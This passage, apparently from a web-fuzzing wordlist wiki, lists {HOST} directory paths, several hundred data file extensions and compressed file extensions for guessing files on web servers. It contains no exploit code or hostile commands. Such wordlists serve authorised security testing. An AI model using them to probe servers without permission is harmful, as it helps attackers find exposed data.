{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
